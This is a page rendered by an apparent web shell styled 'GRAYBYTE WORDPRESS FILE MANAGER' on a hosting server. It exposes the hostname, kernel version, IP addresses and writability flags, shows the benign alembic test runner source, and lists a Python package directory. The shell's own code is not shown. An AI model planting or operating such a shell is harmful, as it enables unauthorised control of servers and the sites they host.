✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ beluga.o2switch.net ​🇻​♯➤ 4.18.0-553.123.2.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2026

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 185.154.139.77 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.84
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /opt/alt/python27/lib/python2.7/site-packages/alembic/testing//runner.py
#!/usr/bin/env python
# testing/runner.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
Nose test runner module.

This script is a front-end to "nosetests" which
installs SQLAlchemy's testing plugin into the local environment.

The script is intended to be used by third-party dialects and extensions
that run within SQLAlchemy's testing framework.    The runner can
be invoked via::

    python -m alembic.testing.runner

The script is then essentially the same as the "nosetests" script, including
all of the usual Nose options.   The test environment requires that a
setup.cfg is locally present including various required options.

Note that when using this runner, Nose's "coverage" plugin will not be
able to provide coverage for SQLAlchemy itself, since SQLAlchemy is
imported into sys.modules before coverage is started.   The special
script sqla_nose.py is provided as a top-level script which loads the
plugin in a special (somewhat hacky) way so that coverage against
SQLAlchemy itself is possible.

"""
from .plugin.noseplugin import NoseSQLAlchemy
import nose


def main():
    nose.main(addplugins=[NoseSQLAlchemy()])


def setup_py_test():
    """Runner to use for the 'test_suite' entry of your setup.py.

    Prevents any name clash shenanigans from the command line
    argument "test" that the "setup.py test" command sends
    to nose.

    """
    nose.main(addplugins=[NoseSQLAlchemy()], argv=['runner'])


Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
25 Jul 2024 8.44 AM
root / linksafe
0755
plugin
--
25 Jul 2024 8.44 AM
root / linksafe
0755
__init__.py
0.247 KB
16 Oct 2015 7.18 PM
root / linksafe
0644
__init__.pyc
0.589 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
__init__.pyo
0.589 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
assertions.py
5.773 KB
16 Oct 2015 7.18 PM
root / linksafe
0644
assertions.pyc
8.179 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
assertions.pyo
7.331 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
compat.py
0.303 KB
16 Oct 2015 7.18 PM
root / linksafe
0644
compat.pyc
0.692 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
compat.pyo
0.692 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
config.py
2.317 KB
16 Oct 2015 7.18 PM
root / linksafe
0644
config.pyc
3.171 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
config.pyo
3.087 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
engines.py
0.748 KB
16 Oct 2015 7.18 PM
root / linksafe
0644
engines.pyc
0.881 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
engines.pyo
0.881 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
env.py
7.583 KB
16 Oct 2015 7.18 PM
root / linksafe
0644
env.pyc
9.192 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
env.pyo
9.146 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
exclusions.py
12.485 KB
16 Oct 2015 7.18 PM
root / linksafe
0644
exclusions.pyc
19.19 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
exclusions.pyo
19.013 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
fixtures.py
4.413 KB
16 Oct 2015 7.18 PM
root / linksafe
0644
fixtures.pyc
6.461 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
fixtures.pyo
6.299 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
mock.py
0.772 KB
16 Oct 2015 7.18 PM
root / linksafe
0644
mock.pyc
0.793 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
mock.pyo
0.793 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
provision.py
4.939 KB
16 Oct 2015 7.18 PM
root / linksafe
0644
provision.pyc
7.748 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
provision.pyo
7.748 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
requirements.py
2.992 KB
16 Oct 2015 7.18 PM
root / linksafe
0644
requirements.pyc
6.972 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
requirements.pyo
6.972 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
runner.py
1.564 KB
16 Oct 2015 7.18 PM
root / linksafe
0644
runner.pyc
1.827 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
runner.pyo
1.827 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
util.py
0.466 KB
16 Oct 2015 7.18 PM
root / linksafe
0644
util.pyc
0.804 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
util.pyo
0.804 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
warnings.py
1.348 KB
16 Oct 2015 7.18 PM
root / linksafe
0644
warnings.pyc
1.575 KB
1 Nov 2019 4.35 PM
root / linksafe
0644
warnings.pyo
1.51 KB
1 Nov 2019 4.35 PM
root / linksafe
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF